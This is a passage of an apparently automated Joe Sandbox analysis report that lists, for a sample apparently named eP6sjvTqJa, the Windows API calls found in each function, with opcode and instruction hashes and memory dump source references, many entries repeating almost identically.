                                                                                                                    • Instruction ID: 8e47440bf341f0ab3c251f5173c8ac7fa161febc25f69d66d2a6d9781b863009
                                                                                                                    • Opcode Fuzzy Hash: 5b7ce569f6a1e5e88cdd594c4362479c9cad09c5ba80e1ebebe16f48b54da503
                                                                                                                    • Instruction Fuzzy Hash: D4F0A0322083169F8F119EA8EC04A9A77E9EF02F307104165FA05E7190EB31EA20C790
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 5205025a350fdbba8973c4a664c891f88dd4588ade22c9c04bffb8b419f1495d
                                                                                                                    • Instruction ID: 7b05517995c84bd4f3fdbdb1254e72eacee8ab5125a4493833bd7a66f1f2ecb4
                                                                                                                    • Opcode Fuzzy Hash: 5205025a350fdbba8973c4a664c891f88dd4588ade22c9c04bffb8b419f1495d
                                                                                                                    • Instruction Fuzzy Hash: 3EE06D3120E225E7EB762B659C05B9B76C8EF437B4F1502E1AC5EAB891DF61CD0086E1
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B85AC2
                                                                                                                      • Part of subcall function 00B8B505: __EH_prolog.LIBCMT ref: 00B8B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: c7677fc7d8d3ba9e969f5395418178dc35a764c9159706d82cdfed538bfde405
                                                                                                                    • Instruction ID: 9031379b089745e5c4335fb344806d9e87b691406e8b750793a384cd147a6f02
                                                                                                                    • Opcode Fuzzy Hash: c7677fc7d8d3ba9e969f5395418178dc35a764c9159706d82cdfed538bfde405
                                                                                                                    • Instruction Fuzzy Hash: FB016930920690DEDB25F7B8C0517EDBBE4DF64304F5084DDA45663282DBB42B08D7A2
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B8A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6C4
                                                                                                                      • Part of subcall function 00B8A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6F2
                                                                                                                      • Part of subcall function 00B8A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6FE
                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B8A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464966427-0
                                                                                                                    • Opcode ID: b54940568d4bee95ccde5e227e0291497347d32b688c76c65bd21b1f3d39a7ee
                                                                                                                    • Instruction ID: a64edec3b7eb9be775db6820cb6e228c0a68808bb0fd905a500a8d8dacbdcd47
                                                                                                                    • Opcode Fuzzy Hash: b54940568d4bee95ccde5e227e0291497347d32b688c76c65bd21b1f3d39a7ee
                                                                                                                    • Instruction Fuzzy Hash: A4F08931008790ABDB227BB44904BD77BD05F25331F048A8AF1FD521B6C27550D4DB23
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00B90E3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2211380416-0
                                                                                                                    • Opcode ID: d89b00f1861cc41de1a70ff7c7cef1c060e3d5f7bb6d5891dd55b7f751b7d457
                                                                                                                    • Instruction ID: 0bbe351321c984b683e51cf1c9074e05eca17ef8a1a5cd1fee48999b437c8669
                                                                                                                    • Opcode Fuzzy Hash: d89b00f1861cc41de1a70ff7c7cef1c060e3d5f7bb6d5891dd55b7f751b7d457
                                                                                                                    • Instruction Fuzzy Hash: ADD01211A150555ADE11372C6955BFE26C7CFCB311F0D08F5B14567193CE544886A361
                                                                                                                    APIs
                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00B9A62C
                                                                                                                      • Part of subcall function 00B9A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B9A3DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1915507550-0
                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction ID: 6f6936d02a0c74ab02a55c4b7bbec039decf211e6489bdbe37c83afbf200a1da
                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction Fuzzy Hash: B3D0C971214209BADF42AF728C5297E7ADAEB01340F0481B5B842D5191EAB1E910A6A6
                                                                                                                    APIs
                                                                                                                    • DloadProtectSection.DELAYIMP ref: 00B9E5E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DloadProtectSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2203082970-0
                                                                                                                    • Opcode ID: b8df1e44eca60a4e7260f93ce0088715cdf2f51febb005d39468f6f6ffbcf961
                                                                                                                    • Instruction ID: a71590ed2e4e1b60495ed203ac0aace16d287bb4f103ca34cfe73372146779f8
                                                                                                                    • Opcode Fuzzy Hash: b8df1e44eca60a4e7260f93ce0088715cdf2f51febb005d39468f6f6ffbcf961
                                                                                                                    • Instruction Fuzzy Hash: FED0C9B0580280ABDE12EBACA8C672437D4F324B04FB009E5F165DA6A5DFB4C490C606
                                                                                                                    APIs
                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00B91B3E), ref: 00B9DD92
                                                                                                                      • Part of subcall function 00B9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9B579
                                                                                                                      • Part of subcall function 00B9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B58A
                                                                                                                      • Part of subcall function 00B9B568: IsDialogMessageW.USER32(0001040E,?), ref: 00B9B59E
                                                                                                                      • Part of subcall function 00B9B568: TranslateMessage.USER32(?), ref: 00B9B5AC
                                                                                                                      • Part of subcall function 00B9B568: DispatchMessageW.USER32(?), ref: 00B9B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 897784432-0
                                                                                                                    • Opcode ID: e5a8bf137fb03a967e1664654e3ce72a90932ec27d552018f26c1f1732a469dc
                                                                                                                    • Instruction ID: 95953b84d048ce8ba3972e1d96878f3bc383859c40364091652487b927702fa6
                                                                                                                    • Opcode Fuzzy Hash: e5a8bf137fb03a967e1664654e3ce72a90932ec27d552018f26c1f1732a469dc
                                                                                                                    • Instruction Fuzzy Hash: 14D09E31154300BADA012B51DE06F1A7AE2AB98B08F004599B284750B18A729D61DB12
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(000000FF,00B897BE), ref: 00B898C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: 877b0e2fa963ddaf5dfa31d20e1928376c4ad6010dcb50ea23370b13aeb1eab5
                                                                                                                    • Instruction ID: 3a691f7c31c0c9b4755bd93a66a0c8c700ed61d6005d81359d903bb2093eda97
                                                                                                                    • Opcode Fuzzy Hash: 877b0e2fa963ddaf5dfa31d20e1928376c4ad6010dcb50ea23370b13aeb1eab5
                                                                                                                    • Instruction Fuzzy Hash: F3C00234404206968E61AA2498490A977A2EF637EA7B897D4D0798A0F1C722CC97EB11
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: c1b661f9a7fe65d06a8a30b8b4aaaec715d8cb056975e153084f0c0ffb4113ee
                                                                                                                    • Instruction ID: d0913e2093c7a0109932b620099cd5e43f33d29b30f96d5ac48e543084eda88a
                                                                                                                    • Opcode Fuzzy Hash: c1b661f9a7fe65d06a8a30b8b4aaaec715d8cb056975e153084f0c0ffb4113ee
                                                                                                                    • Instruction Fuzzy Hash: A1B012D2268041BD3504D2461C47D3701CCC0C1F10330C0FEFC25D51C0ED80EC840432
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9EAF9
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
